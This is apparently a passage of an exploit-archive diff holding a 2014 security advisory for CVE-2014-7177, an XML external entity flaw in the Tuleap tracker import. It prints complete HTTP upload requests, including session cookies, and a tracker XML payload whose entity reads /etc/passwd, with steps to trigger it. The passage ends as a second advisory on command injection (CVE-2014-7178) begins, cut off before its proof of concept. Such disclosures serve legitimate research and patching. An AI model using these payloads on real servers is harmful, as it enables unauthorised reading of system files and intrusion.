<permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F12" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F12" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F12" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
|
||||
</permissions>
|
||||
</tracker>
|
||||
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="name"
|
||||
|
||||
123
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="description"
|
||||
|
||||
123
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="itemname"
|
||||
|
||||
e123
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="Create"
|
||||
|
||||
Créer
|
||||
-----------------------------25777276834778--
|
||||
|
||||
|
||||
2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:
|
||||
|
||||
|
||||
https://[ip]/plugins/tracker/?group_id=102&tracker=11
|
||||
|
||||
|
||||
3) Using retrieved tracker number, a XXE can be trigerred by visiting the following URL:
|
||||
|
||||
|
||||
https://[ip]/plugins/tracker/?tracker=11&func=admin-formElements
|
||||
|
||||
|
||||
Vulnerability 2
|
||||
|
||||
1) Upload a XXE using the following request:
|
||||
|
||||
<
|
||||
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
|
||||
Host: [ip]
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
|
||||
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=e619b58add92383b3647ee5ba68c4a79
|
||||
Connection: keep-alive
|
||||
Content-Type: multipart/form-data; boundary=---------------------------12077103611061
|
||||
Content-Length: 25588
|
||||
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="group_id"
|
||||
|
||||
102
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="func"
|
||||
|
||||
docreate
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="group_id_template"
|
||||
|
||||
100
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="tracker_new_prjname"
|
||||
|
||||
Commencez à taper
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="create_mode"
|
||||
|
||||
xml
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="tracker_bugs.xml"
|
||||
Content-Type: text/xml
|
||||
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
|
||||
<tracker instantiate_for_new_projects="0">
|
||||
<name>Bugs</name>
|
||||
<item_name>bug</item_name>
|
||||
<description>Bugs Tracker</description>
|
||||
<cannedResponses/>
|
||||
<formElements>
|
||||
<formElement type="column" ID="F1" rank="120">
|
||||
<name>column8</name>
|
||||
<label>Column Top 1</label>
|
||||
<formElements>
|
||||
<formElement type="aid" ID="F2" rank="0">
|
||||
<name>artifact_id</name>
|
||||
<label>Artifact ID</label>
|
||||
<description>Unique artifact identifier&xxe;</description>
|
||||
</formElement>
|
||||
<formElement type="subby" ID="F3" rank="1">
|
||||
<name>submitted_by</name>
|
||||
<label>Submitted by</label>
|
||||
<description>User who originally submitted the artifact&xxe;</description>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="column" ID="F4" rank="121">
|
||||
<name>column10&xxe;</name>
|
||||
<label>Column Top 2&xxe;</label>
|
||||
<formElements>
|
||||
<formElement type="lud" ID="F5" rank="0">
|
||||
<name>last_update_date</name>
|
||||
<label>Last Modified On&xxe;</label>
|
||||
<description>Date and time of the latest modification in an artifact&xxe;</description>
|
||||
</formElement>
|
||||
<formElement type="subon" ID="F6" rank="2">
|
||||
<name>open_date&xxe;</name>
|
||||
<label>Submitted on&xxe;</label>
|
||||
<description>Date and time for the initial artifact submission&xxe;</description>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="fieldset" ID="F7" rank="132" required="1">
|
||||
<name>fieldset_1</name>
|
||||
<label>Details</label>
|
||||
<description>fieldset_default_desc_key</description>
|
||||
<formElements>
|
||||
<formElement type="string" ID="F8" rank="0" required="1">
|
||||
<name>summary</name>
|
||||
<label>Summary</label>
|
||||
<description>One line description of the artifact</description>
|
||||
<properties maxchars="150" size="61"/>
|
||||
</formElement>
|
||||
<formElement type="text" ID="F9" rank="7">
|
||||
<name>details</name>
|
||||
<label>Original Submission</label>
|
||||
<description>A full description of the artifact</description>
|
||||
<properties rows="7" cols="80"/>
|
||||
</formElement>
|
||||
<formElement type="column" ID="F10" rank="8">
|
||||
<name>column10</name>
|
||||
<label>Column Details 1</label>
|
||||
<formElements>
|
||||
<formElement type="sb" ID="F11" rank="0">
|
||||
<name>severity</name>
|
||||
<label>Severity</label>
|
||||
<description>Impact of the artifact on the system (Critical, Major,...)</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F11-V0" label="1 - Ordinary"/>
|
||||
<item ID="F11-V1" label="2"/>
|
||||
<item ID="F11-V2" label="3"/>
|
||||
<item ID="F11-V3" label="4"/>
|
||||
<item ID="F11-V4" label="5 - Major"/>
|
||||
<item ID="F11-V5" label="6"/>
|
||||
<item ID="F11-V6" label="7"/>
|
||||
<item ID="F11-V7" label="8"/>
|
||||
<item ID="F11-V8" label="9 - Critical"/>
|
||||
</items>
|
||||
<decorators>
|
||||
<decorator REF="F11-V0" r="255" g="255" b="102"/>
|
||||
<decorator REF="F11-V1" r="255" g="204" b="51"/>
|
||||
<decorator REF="F11-V2" r="255" g="153" b="0"/>
|
||||
<decorator REF="F11-V3" r="255" g="102" b="0"/>
|
||||
<decorator REF="F11-V4" r="255" g="51" b="0"/>
|
||||
<decorator REF="F11-V5" r="204" g="0" b="0"/>
|
||||
<decorator REF="F11-V6" r="153" g="0" b="0"/>
|
||||
<decorator REF="F11-V7" r="102" g="0" b="0"/>
|
||||
<decorator REF="F11-V8" r="51" g="0" b="0"/>
|
||||
</decorators>
|
||||
</bind>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="column" ID="F12" rank="12">
|
||||
<name>column10</name>
|
||||
<label>Column Details 2</label>
|
||||
<formElements>
|
||||
<formElement type="sb" ID="F13" rank="0">
|
||||
<name>category</name>
|
||||
<label>Category</label>
|
||||
<description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
|
||||
<bind type="static" is_rank_alpha="0"/>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="date" ID="F14" rank="20" use_it="0">
|
||||
<name>close_date</name>
|
||||
<label>End Date</label>
|
||||
<description>End Date</description>
|
||||
<properties default_value="today"/>
|
||||
</formElement>
|
||||
<formElement type="msb" ID="F15" rank="31" use_it="0">
|
||||
<name>multi_assigned_to</name>
|
||||
<label>Assigned to (multiple)</label>
|
||||
<description>Who is in charge of this artifact</description>
|
||||
<properties size="7"/>
|
||||
<bind type="users">
|
||||
<items>
|
||||
<item label="group_members"/>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="fieldset" ID="F17" rank="283">
|
||||
<name>fieldset1</name>
|
||||
<label>Stage</label>
|
||||
<formElements>
|
||||
<formElement type="column" ID="F18" rank="0">
|
||||
<name>column3</name>
|
||||
<label>Stage 1</label>
|
||||
<formElements>
|
||||
<formElement type="sb" ID="F19" rank="2">
|
||||
<name>status_id</name>
|
||||
<label>Status</label>
|
||||
<description>Artifact Status</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F19-V0" label="New"/>
|
||||
<item ID="F19-V1" label="Unconfirmed"/>
|
||||
<item ID="F19-V2" label="Verified"/>
|
||||
<item ID="F19-V3" label="Resolved"/>
|
||||
<item ID="F19-V4" label="Closed"/>
|
||||
<item ID="F19-V5" label="Reopened"/>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F20" rank="5" use_it="0">
|
||||
<name>stage</name>
|
||||
<label>Stage</label>
|
||||
<description>Stage in the life cycle of the artifact</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F20-V0" label="New">
|
||||
<description>The artifact has just been submitted</description>
|
||||
</item>
|
||||
<item ID="F20-V1" label="Analyzed">
|
||||
<description>The cause of the artifact has been identified and documented</description>
|
||||
</item>
|
||||
<item ID="F20-V2" label="Accepted">
|
||||
<description>The artifact will be worked on.</description>
|
||||
</item>
|
||||
<item ID="F20-V3" label="Under Implementation">
|
||||
<description>The artifact is being worked on.</description>
|
||||
</item>
|
||||
<item ID="F20-V4" label="Ready for Review">
|
||||
<description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
|
||||
</item>
|
||||
<item ID="F20-V5" label="Ready for Test">
|
||||
<description>Updated/Created software is ready to be included in the next build</description>
|
||||
</item>
|
||||
<item ID="F20-V6" label="In Test">
|
||||
<description>Updated/Created software is in the build and is ready to enter the test phase</description>
|
||||
</item>
|
||||
<item ID="F20-V7" label="Approved">
|
||||
<description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
|
||||
</item>
|
||||
<item ID="F20-V8" label="Declined">
|
||||
<description>The artifact was not accepted.</description>
|
||||
</item>
|
||||
<item ID="F20-V9" label="Done">
|
||||
<description>The artifact is closed.</description>
|
||||
</item>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="column" ID="F21" rank="2">
|
||||
<name>column4</name>
|
||||
<label>Stage 2</label>
|
||||
<formElements>
|
||||
<formElement type="sb" ID="F22" rank="0">
|
||||
<name>resolution</name>
|
||||
<label>Resolution</label>
|
||||
<description>The resolution field indicates what happened to the bug.</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F22-V0" label="Fixed"/>
|
||||
<item ID="F22-V1" label="Will not fix"/>
|
||||
<item ID="F22-V2" label="Invalid"/>
|
||||
<item ID="F22-V3" label="Later"/>
|
||||
<item ID="F22-V4" label="Duplicate"/>
|
||||
<item ID="F22-V5" label="Remind"/>
|
||||
<item ID="F22-V6" label="Works for me"/>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="column" ID="F23" rank="3">
|
||||
<name>column9</name>
|
||||
<label>Stage 3</label>
|
||||
<formElements>
|
||||
<formElement type="sb" ID="F24" rank="0" notifications="1">
|
||||
<name>assigned_to</name>
|
||||
<label>Assigned to</label>
|
||||
<description>Who is in charge of solving the artifact</description>
|
||||
<bind type="users">
|
||||
<items>
|
||||
<item label="group_members"/>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="fieldset" ID="F25" rank="284">
|
||||
<name>fieldset1</name>
|
||||
<label>Attachments</label>
|
||||
<formElements>
|
||||
<formElement type="file" ID="F26" rank="0">
|
||||
<name>attachment</name>
|
||||
<label>Attachments</label>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="fieldset" ID="F27" rank="286">
|
||||
<name>fieldset1</name>
|
||||
<label>References</label>
|
||||
<formElements>
|
||||
<formElement type="cross" ID="F28" rank="0">
|
||||
<name>cross_references</name>
|
||||
<label>Cross references</label>
|
||||
<description>List of items referenced by or referencing this item.</description>
|
||||
</formElement>
|
||||
<formElement type="art_link" ID="F29" rank="1" use_it="0">
|
||||
<name>references</name>
|
||||
<label>References</label>
|
||||
<properties size="30"/>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="fieldset" ID="F30" rank="287">
|
||||
<name>fieldset1</name>
|
||||
<label>Permissions</label>
|
||||
<formElements>
|
||||
<formElement type="perm" ID="F31" rank="0">
|
||||
<name>permissions_on_artifact</name>
|
||||
<label>Permissions on artifact</label>
|
||||
<description>Let users groups to define who can access an artifact.</description>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F32" rank="26" use_it="0">
|
||||
<name>platform</name>
|
||||
<label>Platform</label>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F32-V0" label="Linux"/>
|
||||
<item ID="F32-V1" label="Windows XP"/>
|
||||
<item ID="F32-V2" label="Solaris"/>
|
||||
<item ID="F32-V3" label="Windows 2000"/>
|
||||
<item ID="F32-V4" label="Other"/>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F33" rank="28" use_it="0">
|
||||
<name>source</name>
|
||||
<label>Source</label>
|
||||
<description>Customer from which the request comes from.</description>
|
||||
<bind type="static" is_rank_alpha="0"/>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F34" rank="30" use_it="0">
|
||||
<name>version</name>
|
||||
<label>Version</label>
|
||||
<description>Product version concerned by the bug.</description>
|
||||
<bind type="static" is_rank_alpha="0"/>
|
||||
</formElement>
|
||||
</formElements>
|
||||
<semantics>
|
||||
<semantic type="title">
|
||||
<shortname>title</shortname>
|
||||
<label>Titre</label>
|
||||
<description>Définir le titre d'un artéfact</description>
|
||||
<field REF="F8"/>
|
||||
</semantic>
|
||||
<semantic type="status">
|
||||
<shortname>status</shortname>
|
||||
<label>Ã?tat</label>
|
||||
<description>Définir l'état d'un artifact</description>
|
||||
<field REF="F19"/>
|
||||
<open_values>
|
||||
<open_value REF="F19-V0"/>
|
||||
<open_value REF="F19-V1"/>
|
||||
<open_value REF="F19-V2"/>
|
||||
<open_value REF="F19-V3"/>
|
||||
<open_value REF="F19-V5"/>
|
||||
</open_values>
|
||||
</semantic>
|
||||
<semantic type="contributor">
|
||||
<shortname>contributor</shortname>
|
||||
<label>Contributor/assignee</label>
|
||||
<description>Define the contributor/assignee of an artifact</description>
|
||||
<field REF="F24"/>
|
||||
</semantic>
|
||||
<semantic type="tooltip">
|
||||
<field REF="F2"/>
|
||||
<field REF="F8"/>
|
||||
<field REF="F19"/>
|
||||
</semantic>
|
||||
</semantics>
|
||||
<reports>
|
||||
<report is_default="0">
|
||||
<name>Bugs</name>
|
||||
<description>The system default artifact report</description>
|
||||
<criterias>
|
||||
<criteria rank="0">
|
||||
<field REF="F19"/>
|
||||
</criteria>
|
||||
<criteria rank="1">
|
||||
<field REF="F24"/>
|
||||
</criteria>
|
||||
<criteria rank="2">
|
||||
<field REF="F6"/>
|
||||
</criteria>
|
||||
<criteria rank="3">
|
||||
<field REF="F2"/>
|
||||
</criteria>
|
||||
<criteria rank="4">
|
||||
<field REF="F5"/>
|
||||
</criteria>
|
||||
<criteria rank="5">
|
||||
<field REF="F8"/>
|
||||
</criteria>
|
||||
<criteria rank="6">
|
||||
<field REF="F9"/>
|
||||
</criteria>
|
||||
<criteria rank="7">
|
||||
<field REF="F22"/>
|
||||
</criteria>
|
||||
<criteria rank="8">
|
||||
<field REF="F13"/>
|
||||
</criteria>
|
||||
</criterias>
|
||||
<renderers>
|
||||
<renderer type="table" rank="0" chunksz="15" multisort="15">
|
||||
<name>Results</name>
|
||||
<columns>
|
||||
<field REF="F2"/>
|
||||
<field REF="F8"/>
|
||||
<field REF="F6"/>
|
||||
<field REF="F24"/>
|
||||
<field REF="F3"/>
|
||||
</columns>
|
||||
</renderer>
|
||||
<renderer type="plugin_graphontrackersv5" rank="1">
|
||||
<name>Charts</name>
|
||||
<description>Graphic Report</description>
|
||||
<charts>
|
||||
<chart type="pie" width="600" height="400" rank="0" base="F19">
|
||||
<title>Status</title>
|
||||
<description>Number of Artifacts by Status</description>
|
||||
</chart>
|
||||
<chart type="bar" width="600" height="400" rank="1" base="F11">
|
||||
<title>Severity</title>
|
||||
<description>Number of Artifacts by severity level</description>
|
||||
</chart>
|
||||
<chart type="pie" width="600" height="400" rank="2" base="F24">
|
||||
<title>Assignment</title>
|
||||
<description>Number of Artifacts by Assignee</description>
|
||||
</chart>
|
||||
</charts>
|
||||
</renderer>
|
||||
</renderers>
|
||||
</report>
|
||||
<report is_default="0">
|
||||
<name>Default</name>
|
||||
<description>The system default artifact report</description>
|
||||
<criterias>
|
||||
<criteria rank="0">
|
||||
<field REF="F19"/>
|
||||
</criteria>
|
||||
<criteria rank="1">
|
||||
<field REF="F24"/>
|
||||
</criteria>
|
||||
<criteria rank="2">
|
||||
<field REF="F6"/>
|
||||
</criteria>
|
||||
<criteria rank="3">
|
||||
<field REF="F2"/>
|
||||
</criteria>
|
||||
<criteria rank="4">
|
||||
<field REF="F13"/>
|
||||
</criteria>
|
||||
</criterias>
|
||||
<renderers>
|
||||
<renderer type="table" rank="0" chunksz="15" multisort="15">
|
||||
<name>Results</name>
|
||||
<columns>
|
||||
<field REF="F2"/>
|
||||
<field REF="F8"/>
|
||||
<field REF="F6"/>
|
||||
<field REF="F24"/>
|
||||
<field REF="F3"/>
|
||||
</columns>
|
||||
</renderer>
|
||||
</renderers>
|
||||
</report>
|
||||
</reports>
|
||||
<workflow>
|
||||
<field_id REF="F19"/>
|
||||
<is_used>1</is_used>
|
||||
<transitions>
|
||||
<transition>
|
||||
<from_id REF="null"/>
|
||||
<to_id REF="F19-V0"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V0"/>
|
||||
<to_id REF="F19-V1"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V0"/>
|
||||
<to_id REF="F19-V2"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V0"/>
|
||||
<to_id REF="F19-V4"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V1"/>
|
||||
<to_id REF="F19-V2"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V1"/>
|
||||
<to_id REF="F19-V4"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V3"/>
|
||||
<to_id REF="F19-V4"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V4"/>
|
||||
<to_id REF="F19-V5"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V5"/>
|
||||
<to_id REF="F19-V3"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V5"/>
|
||||
<to_id REF="F19-V4"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V0"/>
|
||||
<to_id REF="F19-V3"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V1"/>
|
||||
<to_id REF="F19-V3"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V2"/>
|
||||
<to_id REF="F19-V3"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V2"/>
|
||||
<to_id REF="F19-V4"/>
|
||||
</transition>
|
||||
</transitions>
|
||||
</workflow>
|
||||
<permissions>
|
||||
<permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
|
||||
<permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F5" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F6" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F9" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F9" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F9" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F14" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F14" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F14" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F15" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F15" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F15" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F19" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F19" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F19" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F20" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F20" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F20" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F22" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F22" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F22" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F24" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F24" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F24" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F26" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F26" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F26" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F28" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F29" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F29" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F29" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F31" ugroup="UGROUP_PROJECT_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F32" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F32" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F32" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F33" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F33" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F33" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F34" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F34" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F34" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<!--TODO TRACKER_ADMIN <permission scope="field" REF="F31" ugroup="UGROUP_PLUGIN_TRACKER_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/> -->
|
||||
</permissions>
|
||||
</tracker>
|
||||
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="name"
|
||||
|
||||
Bugs
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="description"
|
||||
|
||||
Bugs Tracker
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="itemname"
|
||||
|
||||
bug
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="Create"
|
||||
|
||||
Créer
|
||||
-----------------------------12077103611061--
|
||||
|
||||
|
||||
2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:
|
||||
|
||||
|
||||
https://[ip]/plugins/tracker/?group_id=102&tracker=12
|
||||
|
||||
|
||||
3) Using retrieved tracker number and URL, a XXE can be trigerred by visiting the retrieved URL:
|
||||
|
||||
|
||||
https://[ip]/plugins/tracker/?group_id=102&tracker=12
|
||||
|
||||
|
||||
Further details at:
|
||||
|
||||
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7177/
|
||||
|
||||
Copyright:
|
||||
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
|
||||
|
||||
Disclaimer:
|
||||
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
|
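--- a/platforms/php/webapps/35100.txt
+++ b/platforms/php/webapps/35100.txt
@@ -0,0 +1,41 @@
+Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
+CVE: CVE-2014-7178
+Vendor: Enalean
+Product: Tuleap
+Affected version: 7.4.99.5 and earlier
+Fixed version: 7.5
+Reported by: Jerzy Kramarz
+
+Details:
+
+Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() function are introducing any extra parameters that would be executed in the content of the application.
+
+This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application that would execute them as shown on the attached Proof Of Concept code below.
+
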